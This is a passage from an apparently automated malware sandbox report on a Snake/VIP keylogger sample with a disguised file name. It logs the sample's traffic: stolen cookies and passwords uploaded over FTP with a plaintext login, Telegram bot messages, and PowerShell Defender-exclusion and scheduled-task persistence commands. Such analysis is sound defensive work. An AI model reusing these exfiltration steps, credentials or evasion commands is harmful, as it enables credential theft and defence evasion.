States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49745	188.114.96.3	443	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:56 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-03 07:16:56 UTC	682	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:16:56 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 63610 Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y1E4%2BN2I8Wa%2BlXuGrN3wRxWBTsBz1fnAuROP5nZgnShuxLZ0hA66O8XRcPBvqA6g%2B9OwvggW3mYHppXGgOdJKjBbSbJF%2Bf7m0gYm%2FGppilyp%2FLumkvARPQXTtSbUu20oQ7AvTy4V"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ccb264adf0e4344-EWR
2024-10-03 07:16:56 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-03 07:16:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49747	149.154.167.220	443	7664	C:\Users\user\AppData\Roaming\SOFcFE.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:16:59 UTC	334	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2021:14:30%0D%0ACountry%20Name:%20%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-03 07:17:00 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:16:59 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-03 07:17:00 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 3, 2024 09:16:50.589318037 CEST	21	49737	119.18.54.39	192.168.2.7	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 20 of 150 allowed.220-Local time is now 12:46. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Oct 3, 2024 09:16:50.596858978 CEST	49737	21	192.168.2.7	119.18.54.39	USER awaratre_log@awaratrendz.com
Oct 3, 2024 09:16:50.959996939 CEST	21	49737	119.18.54.39	192.168.2.7	331 User awaratre_log@awaratrendz.com OK. Password required
Oct 3, 2024 09:16:50.960336924 CEST	49737	21	192.168.2.7	119.18.54.39	PASS mxH!EyDs(.jx
Oct 3, 2024 09:16:51.658968925 CEST	21	49737	119.18.54.39	192.168.2.7	230 OK. Current restricted directory is /
Oct 3, 2024 09:16:52.020490885 CEST	21	49737	119.18.54.39	192.168.2.7	504 Unknown command
Oct 3, 2024 09:16:52.020718098 CEST	49737	21	192.168.2.7	119.18.54.39	PWD
Oct 3, 2024 09:16:52.371349096 CEST	21	49737	119.18.54.39	192.168.2.7	257 "/" is your current location
Oct 3, 2024 09:16:52.371491909 CEST	49737	21	192.168.2.7	119.18.54.39	TYPE I
Oct 3, 2024 09:16:52.721925020 CEST	21	49737	119.18.54.39	192.168.2.7	200 TYPE is now 8-bit binary
Oct 3, 2024 09:16:52.722063065 CEST	49737	21	192.168.2.7	119.18.54.39	PASV
Oct 3, 2024 09:16:53.372594118 CEST	21	49737	119.18.54.39	192.168.2.7	227 Entering Passive Mode (119,18,54,39,169,102)
Oct 3, 2024 09:16:53.372623920 CEST	21	49737	119.18.54.39	192.168.2.7	227 Entering Passive Mode (119,18,54,39,169,102)
Oct 3, 2024 09:16:53.380671024 CEST	49737	21	192.168.2.7	119.18.54.39	STOR 724471 - Cookies ID - ZyiAEnXWZP922243209.txt
Oct 3, 2024 09:16:54.289454937 CEST	21	49737	119.18.54.39	192.168.2.7	150 Accepted data connection
Oct 3, 2024 09:16:54.661472082 CEST	21	49737	119.18.54.39	192.168.2.7	226-File successfully transferred 226-File successfully transferred226 0.383 seconds (measured here), 2.65 Kbytes per second
Oct 3, 2024 09:17:06.264187098 CEST	21	49748	119.18.54.39	192.168.2.7	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 21 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 21 of 150 allowed.220-Local time is now 12:47. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 21 of 150 allowed.220-Local time is now 12:47. Server port: 21.220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 21 of 150 allowed.220-Local time is now 12:47. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Oct 3, 2024 09:17:06.264745951 CEST	49748	21	192.168.2.7	119.18.54.39	USER awaratre_log@awaratrendz.com
Oct 3, 2024 09:17:06.609932899 CEST	21	49748	119.18.54.39	192.168.2.7	331 User awaratre_log@awaratrendz.com OK. Password required
Oct 3, 2024 09:17:06.610325098 CEST	49748	21	192.168.2.7	119.18.54.39	PASS mxH!EyDs(.jx
Oct 3, 2024 09:17:07.288722038 CEST	21	49748	119.18.54.39	192.168.2.7	230 OK. Current restricted directory is /
Oct 3, 2024 09:17:07.635574102 CEST	21	49748	119.18.54.39	192.168.2.7	504 Unknown command
Oct 3, 2024 09:17:07.635885954 CEST	49748	21	192.168.2.7	119.18.54.39	PWD
Oct 3, 2024 09:17:07.979543924 CEST	21	49748	119.18.54.39	192.168.2.7	257 "/" is your current location
Oct 3, 2024 09:17:07.980005026 CEST	49748	21	192.168.2.7	119.18.54.39	TYPE I
Oct 3, 2024 09:17:08.339272976 CEST	21	49748	119.18.54.39	192.168.2.7	200 TYPE is now 8-bit binary
Oct 3, 2024 09:17:08.339668036 CEST	49748	21	192.168.2.7	119.18.54.39	PASV
Oct 3, 2024 09:17:08.688160896 CEST	21	49748	119.18.54.39	192.168.2.7	227 Entering Passive Mode (119,18,54,39,186,166)
Oct 3, 2024 09:17:08.695727110 CEST	49748	21	192.168.2.7	119.18.54.39	STOR 724471 - Passwords ID - ZyiAEnXWZP186224458.txt
Oct 3, 2024 09:17:09.608916044 CEST	21	49748	119.18.54.39	192.168.2.7	150 Accepted data connection
Oct 3, 2024 09:17:09.961546898 CEST	21	49748	119.18.54.39	192.168.2.7	150 Accepted data connection
Oct 3, 2024 09:17:09.964710951 CEST	21	49748	119.18.54.39	192.168.2.7	226-File successfully transferred 226-File successfully transferred226 0.370 seconds (measured here), 0.91 Kbytes per second
Oct 3, 2024 09:17:11.471400023 CEST	49748	21	192.168.2.7	119.18.54.39	PASV
Oct 3, 2024 09:17:11.816059113 CEST	21	49748	119.18.54.39	192.168.2.7	227 Entering Passive Mode (119,18,54,39,127,70)
Oct 3, 2024 09:17:11.821758986 CEST	49748	21	192.168.2.7	119.18.54.39	STOR 724471 - Cookies ID - ZyiAEnXWZP186224458.txt
Oct 3, 2024 09:17:12.700716972 CEST	21	49748	119.18.54.39	192.168.2.7	150 Accepted data connection
Oct 3, 2024 09:17:13.044482946 CEST	21	49748	119.18.54.39	192.168.2.7	226-File successfully transferred 226-File successfully transferred226 0.344 seconds (measured here), 2.95 Kbytes per second

Target ID:	1
Start time:	03:16:20
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
Imagebase:	0x980000
File size:	884'224 bytes
MD5 hash:	BE92B638000820878C7BE0E70E257C95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:16:24
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
Imagebase:	0xc70000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:16:24
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:16:25
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SOFcFE.exe"
Imagebase:	0xc70000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:16:25
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:16:25
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmpF6B6.tmp"
Imagebase:	0x550000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:16:25
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:16:25
Start date:	03/10/2024
Path:	C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe"
Imagebase:	0x9a0000
File size:	884'224 bytes
MD5 hash:	BE92B638000820878C7BE0E70E257C95
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	03:16:27
Start date:	03/10/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:16:27
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Roaming\SOFcFE.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\SOFcFE.exe
Imagebase:	0x420000
File size:	884'224 bytes
MD5 hash:	BE92B638000820878C7BE0E70E257C95
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:16:34
Start date:	03/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SOFcFE" /XML "C:\Users\user\AppData\Local\Temp\tmp1AF7.tmp"
Imagebase:	0x550000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:16:34
Start date:	03/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:16:34
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Roaming\SOFcFE.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\SOFcFE.exe"
Imagebase:	0x9e0000
File size:	884'224 bytes
MD5 hash:	BE92B638000820878C7BE0E70E257C95
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000014.00000002.3760059045.000000000042F000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	191
Total number of Limit Nodes:	9

Executed Functions

Function 09CCD2FB Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05ab0372b2da075beb99036e7dc50e04a98ca3e29bc14616cb6ae4fdf6733a31
Instruction ID: 46a01f925f762d8dd4c97bcb946f8e402fb3559c4dc2afecad335f8802e5eb46
Opcode Fuzzy Hash: 05ab0372b2da075beb99036e7dc50e04a98ca3e29bc14616cb6ae4fdf6733a31
Instruction Fuzzy Hash: C051E3B1D45629CBEB28CF66D8407E9FAB6BF89300F04D1FAD50DA6250EB705A85CF50

Function 09CC44E0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83c1dfd385719dc7ba3092cd2265ff7320992302692425578ee7171fe3456ff4
Instruction ID: 5e14448f195ff5b03d72b80d9fd1882fb0e1df854e578ba789667c773ea46ea4
Opcode Fuzzy Hash: 83c1dfd385719dc7ba3092cd2265ff7320992302692425578ee7171fe3456ff4
Instruction Fuzzy Hash: 3D2109B1D056588BEB18CFA6D8553EEBFF6AF89300F04C06AD4096A2A5DB740949CF90

Function 010AD051 Relevance: 6.1, APIs: 4, Instructions: 134
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 010AD0DE
GetCurrentThread.KERNEL32 ref: 010AD11B
GetCurrentProcess.KERNEL32 ref: 010AD158
GetCurrentThreadId.KERNEL32 ref: 010AD1B1

Memory Dump Source

Source File: 00000001.00000002.1358269074.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b04a5446737a79d865a050fae9e45a7bdee1daa83680339bb4595a2ed279599c
Instruction ID: fd3134a4a6112af26f1834d1263c5212c24fa875121e29dc4e98bebb4af03ddf
Opcode Fuzzy Hash: b04a5446737a79d865a050fae9e45a7bdee1daa83680339bb4595a2ed279599c
Instruction Fuzzy Hash: A65156B0D003499FEB54DFAAD588BDEBBF1AB88310F208459E059A73A0DB346845CB65

Function 010AD060 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 010AD0DE
GetCurrentThread.KERNEL32 ref: 010AD11B
GetCurrentProcess.KERNEL32 ref: 010AD158
GetCurrentThreadId.KERNEL32 ref: 010AD1B1

Memory Dump Source

Source File: 00000001.00000002.1358269074.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3aed19cdb3fdf6b73e8186275036c427aa682bd1fc8fe183bed5f11be6ac5a10
Instruction ID: 2000b944d8bbe60da7ded62cf5129d2d5fa253ea7dc6f957cdf3b4ff4798f10c
Opcode Fuzzy Hash: 3aed19cdb3fdf6b73e8186275036c427aa682bd1fc8fe183bed5f11be6ac5a10
Instruction Fuzzy Hash: C45145B0D007499FEB14DFAAD588BDEBBF1AF88314F208459E018A73A0DB346845CF65

Function 09CCA1CC Relevance: 1.7, APIs: 1, Instructions: 247
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 09CCA40E

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 62bc854c97fc87159552c1764fd26f2252f26362f098795a84e33255ff5d9e52
Instruction ID: f141ccf91de958c138cf6997587c88894e735ab451b97c74e4fd21fb305eb6bd
Opcode Fuzzy Hash: 62bc854c97fc87159552c1764fd26f2252f26362f098795a84e33255ff5d9e52
Instruction Fuzzy Hash: 14A17EB1D0071D9FEB24CFA8D845BEDBBB2BF48314F148169E808A7240DB759A85CF91

Function 09CCA1D8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 09CCA40E

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ed35045a37926554c036bc3993f7f1d1ce1ba81e9a0a26aff50f3c980dab64c5
Instruction ID: 878da2df859338d5c8034c2fd12ada3154a9081344b6301042521b2142e49ad2
Opcode Fuzzy Hash: ed35045a37926554c036bc3993f7f1d1ce1ba81e9a0a26aff50f3c980dab64c5
Instruction Fuzzy Hash: 8F916EB1D0072D9FEB24DFA8D845BDDBBB2BF48314F148169E808A7240DB759A85CF91

Function 010A44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010A59C9

Memory Dump Source

Source File: 00000001.00000002.1358269074.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 20e605ed6b011bdd3ace97710ded59d88370adfdeaf4eb9585c8ad7a1654eea0
Instruction ID: 7b56a65578a7f0951cc4aa56d379d9773e50eed61462096da4ea56cb60349cdc
Opcode Fuzzy Hash: 20e605ed6b011bdd3ace97710ded59d88370adfdeaf4eb9585c8ad7a1654eea0
Instruction Fuzzy Hash: 0B41F271D0071DCBEB24DFAAC884B8DBBF5BF49314F60816AD408AB251DB756946CF90

Function 010A5913 Relevance: 1.6, APIs: 1, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010A59C9

Memory Dump Source

Source File: 00000001.00000002.1358269074.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10a0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8087ae6e8cd6670903ac18b7fd86bb0d5a2aec1bda628577e4e0b172c140f4f9
Instruction ID: ff86b4f5dfd5a8a74904e5e0dffd7359b7400f5757e169daa6f3d5eaf828483e
Opcode Fuzzy Hash: 8087ae6e8cd6670903ac18b7fd86bb0d5a2aec1bda628577e4e0b172c140f4f9
Instruction Fuzzy Hash: D641E0B1D00719CBEB24DFAAC8847CDBBF5BF48314F60816AD408AB261DB756946CF90

Function 09CC9F49 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 09CC9FE0

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c99e3cba0fb2d6b186a11c2d7981d0bd3fbddb50cbc55114d3a188622f4a8830
Instruction ID: b0f9428f25976c96b65003b8d11d0b9efc841f6e31211b2e04dc04c191909b9e
Opcode Fuzzy Hash: c99e3cba0fb2d6b186a11c2d7981d0bd3fbddb50cbc55114d3a188622f4a8830
Instruction Fuzzy Hash: BE2137B5D003499FDB10DFA9C881BDEBBF5FF48310F10842AE959A7241DB799945CBA0

Function 09CC9F50 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 09CC9FE0

Memory Dump Source

Source File: 00000001.00000002.1369647981.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_9cc0000_GeriOdemeBildirimi942.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 21e8ae3d44fcd62c7a10a141161fe8c9a7aa7c36d191888730716db1b5380fd8
